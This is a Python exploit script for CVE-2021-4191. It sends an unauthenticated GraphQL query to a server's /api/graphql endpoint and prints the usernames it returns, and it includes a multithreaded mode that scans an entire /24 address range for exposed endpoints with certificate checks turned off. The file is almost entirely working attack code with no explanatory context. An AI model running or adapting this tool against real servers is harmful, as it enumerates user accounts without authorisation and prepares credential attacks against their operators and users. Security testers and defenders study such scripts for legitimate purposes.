CVE-2021-4191.py

#!/bin/python3

import json
import requests
import urllib3
from colorama import Fore as color
import argparse
import ipaddress
from concurrent.futures import ThreadPoolExecutor

G = color.GREEN
C = color.CYAN
M = color.MAGENTA
W = color.WHITE

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def check_api_graphql(ip):
    results = []
    with ThreadPoolExecutor(max_workers=200) as executor:
        ip_range = ipaddress.IPv4Network(f'{ip}/24')
        for ip_address in ip_range.hosts():
            url = f"https://{ip_address}/api/graphql"
            future = executor.submit(make_request, url)
            results.append((url, future))

        for url, future in results:
            try:
                response = future.result()
                send_get = requests.get(url, timeout=3, verify=False)
                if response and send_get.status_code == 200:
                    print(f"{G}[{M}+{G}] {M}- {W}{url} {G}[{C}Success{G}] {W}GraphQL API found!")
                else:
                    print(f"{G}[{M}+{G}] {M}- {W}{url} {G}[{C}Failed{G}] {W}GraphQL API not found.")
            except requests.exceptions.RequestException:
                print(f"{G}[{M}+{G}] {M}- {W}{url} {G}[{C}Failed{G}] {W}Request failed.")
                continue

def make_request(url):
    try:
        response = requests.get(url, timeout=5)
        return response
    except requests.exceptions.RequestException:
        return None

def main(url):
    headers = {
        "Content-Type": "application/json",
    }

    data = {
        "query": "query { users { pageInfo { hasNextPage, hasPreviousPage, endCursor, startCursor }, nodes { username } } }"
    }

    response = requests.post(url + "/api/graphql", json=data, headers=headers, verify=False)
    if response.status_code == 200:
        result = response.json()
        users = result['data']['users']['nodes']
        for user in users:
            username = user['username']
            print(f"{G}[{M}+{G}] {M}- {W}{url} {G}[{C}username{G}] {W}{username}")
    else:
        print(f"Request failed with status code: {response.status_code}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Query the GraphQL API and display usernames.")
    parser.add_argument("--url", type=str, required=True, help="The URL of the GraphQL API endpoint.")
    parser.add_argument("--ip-range", type=str, help="The IP range to scan for /api/graphql")
    args = parser.parse_args()

    if args.url and args.ip_range:
        check_api_graphql(args.ip_range)
    elif args.url:
        main(args.url)
    else:
        print("Error: You need to provide either both --url and --ip-range or just --url.")